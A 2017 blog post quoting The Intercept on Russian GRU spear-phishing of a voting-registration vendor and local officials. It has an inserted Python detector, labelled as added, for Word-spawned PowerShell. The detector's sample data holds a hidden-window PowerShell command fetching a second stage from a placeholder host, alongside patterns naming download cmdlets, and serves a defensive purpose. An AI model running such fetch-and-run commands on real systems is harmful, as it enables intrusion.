THIS IS HOW DEMOCRACY ENDS…

June 7th, 2017


So, this is what I’m reading this morning:

…Russian hacking may have penetrated further into U.S. voting systems than was previously understood. It states unequivocally in its summary statement that it was Russian military intelligence, specifically the Russian General Staff Main Intelligence Directorate, or GRU, that conducted the cyber attacks…

That’s the lede for Top-Secret NSA Report Details Russian Hacking Effort Days Before 2016 Election by Matthew Cole, Richard Esposito, Sam Biddle and Ryan Grim writing for The Intercept.

From where I sit, this is the biggest story from The Intercept, or any news organization, since Edward Snowden. The piece continues:

This NSA summary judgment is sharply at odds with Russian President Vladimir Putin’s denial last week that Russia had interfered in foreign elections: “We never engaged in that on a state level, and have no intention of doing so.” Putin, who had previously issued blanket denials that any such Russian meddling occurred, for the first time floated the possibility that freelance Russian hackers with “patriotic leanings” may have been responsible. The NSA report, on the contrary, displays no doubt that the cyber assault was carried out by the GRU.

The NSA analysis does not draw conclusions about whether the interference had any effect on the election’s outcome and concedes that much remains unknown about the extent of the hackers’ accomplishments. However, the report raises the possibility that Russian hacking may have breached at least some elements of the voting system, with disconcertingly uncertain results.

Breaking news: Russian President Vladimir Putin lies!

More to the point, in the run-up to the election much was said about the unhackability of voting machines, which, as I repeatedly discussed with friends, was never the issue. First Secretary of the Communist Party Josef Stalin famously quipped (attributed to Stalin by his personal secretary Boris Bazhanov in his 1980 memoir—Memoirs of the former secretary of Stalin):

I consider it completely unimportant who in the party will vote, or how; but what is extraordinarily important is this—who will count the votes, and how.

If Uncle Joe were running an election, he wouldn’t care about voting machines, he would go after the far fewer, and more easily tampered with, central machines that actually count the votes.

The NSA has now learned, however, that Russian government hackers, part of a team with a “cyber espionage mandate specifically directed at U.S. and foreign elections,” focused on parts of the system directly connected to the voter registration process, including a private sector manufacturer of devices that maintain and verify the voter rolls. Some of the company’s devices are advertised as having wireless internet and Bluetooth connectivity, which could have provided an ideal staging point for further malicious actions.

As described by the classified NSA report, the Russian plan was simple: pose as an e-voting vendor and trick local government employees into opening Microsoft Word documents invisibly tainted with potent malware that could give hackers full control over the infected computers.

But in order to dupe the local officials, the hackers needed access to an election software vendor’s internal systems to put together a convincing disguise. So on August 24, 2016, the Russian hackers sent spoofed emails purporting to be from Google to employees of an unnamed U.S. election software company, according to the NSA report. Although the document does not directly identify the company in question, it contains references to a product made by VR Systems [Lower in the story, The Intercept describes the company this way: VR Systems doesn’t sell the actual touchscreen machines used to cast a vote, but rather the software and devices that verify and catalogue who’s permitted to vote when they show up on Election Day or for early voting. JH], a Florida-based vendor of electronic voting services and equipment whose products are used in eight states [California, Florida, Illinois, Indiana, New York, North Carolina, Virginia, and West Virginia. JH].

The spear-phishing email contained a link directing the employees to a malicious, faux-Google website that would request their login credentials and then hand them over to the hackers. The NSA identified seven “potential victims” at the company. While malicious emails targeting three of the potential victims were rejected by an email server, at least one of the employee accounts was likely compromised, the agency concluded. The NSA notes in its report that it is “unknown whether the aforementioned spear-phishing deployment successfully compromised all the intended victims, and what potential data from the victim could have been exfiltrated.”

That was Step One. Step Two followed at the end of October.

on October 27, [the Russian government] set up an “operational” Gmail account designed to appear as if it belonged to an employee at VR Systems, and used documents obtained from the previous operation to launch a second spear-phishing operation “targeting U.S. local government organizations.” These emails contained a Microsoft Word document that had been “trojanized” so that when it was opened it would send out a beacon to the “malicious infrastructure” set up by the hackers.

The NSA assessed that this phase of the spear-phishing operation was likely launched on either October 31 or November 1 and sent spear-phishing emails to 122 email addresses “associated with named local government organizations,” probably to officials “involved in the management of voter registration systems.” The emails contained Microsoft Word attachments purporting to be benign documentation for VR Systems’ EViD voter database product line, but which were in reality maliciously embedded with automated software commands that are triggered instantly and invisibly when the user opens the document. These particular weaponized files used PowerShell, a Microsoft scripting language designed for system administrators and installed by default on Windows computers, allowing vast control over a system’s settings and functions. If opened, the files “very likely” would have instructed the infected computer to begin downloading in the background a second package of malware from a remote server also controlled by the hackers, which the secret report says could have provided attackers with “persistent access” to the computer or the ability to “survey the victims for items of interest.” Essentially, the weaponized Word document quietly unlocks and opens a target’s back door, allowing virtually any cocktail of malware to be subsequently delivered automatically.

According to [Jake Williams, founder of computer security firm Rendition Infosec and formerly of the NSA’s Tailored Access Operations hacking team], if this type of attack were successful, the perpetrator would possess “unlimited” capacity for siphoning away items of interest. [Emphasis mine, JH]
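From the defender's side, the chain quoted above (a Word document that launches PowerShell, which then fetches a second package in the background) leaves a recognizable trace in process-creation logs. The following is an added example, not part of the original post or of The Intercept's article: it triages events whose field names (Image, ParentImage, CommandLine, Computer) are assumed to follow Sysmon process-creation records, and the hosts, paths and URL are constructed sample data.

```python
import re

# Office programs that should not normally launch a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Command-line traits suggesting a background fetch of a second stage.
DOWNLOAD_HINTS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer",
    re.IGNORECASE)
# Traits suggesting the window or the command itself is being concealed.
STEALTH_HINTS = re.compile(r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (severity, reasons) for one process-creation event."""
    reasons = []
    if basename(ev["ParentImage"]) in OFFICE_PARENTS and basename(ev["Image"]) in SHELLS:
        reasons.append("office-spawned-powershell")
        if DOWNLOAD_HINTS.search(ev["CommandLine"]):
            reasons.append("network-download")
        if STEALTH_HINTS.search(ev["CommandLine"]):
            reasons.append("stealth-flags")
    severity = {0: "none", 1: "medium"}.get(len(reasons), "high")
    return severity, reasons

def triage(events):
    """Keep only events worth an analyst's attention."""
    hits = []
    for ev in events:
        severity, reasons = score_event(ev)
        if severity != "none":
            hits.append((ev["Computer"], severity, reasons))
    return hits

WORD = r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events, not taken from any real incident.
SAMPLE_EVENTS = [
    {"Computer": "CLERK-PC1", "ParentImage": WORD, "Image": PS, "CommandLine":
     r'powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest http://stage2.example.invalid/p -OutFile $env:TEMP\p"'},
    {"Computer": "ADMIN-PC", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -Command Get-Service"},
    {"Computer": "CLERK-PC2", "ParentImage": WORD, "Image": PS,
     "CommandLine": "powershell.exe -Command Get-Date"},
    {"Computer": "CLERK-PC3", "ParentImage": r"C:\Windows\explorer.exe", "Image": WORD,
     "CommandLine": "WINWORD.EXE /n manual.docx"},
]
```

An Office parent alone is scored medium because some add-ins do launch scripts; the download and concealment traits are what raise it to high.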

Nothing, absolutely nothing is more vital to a democracy than the security of the voting process. Tamper with that enough and the democracy becomes a fiction.
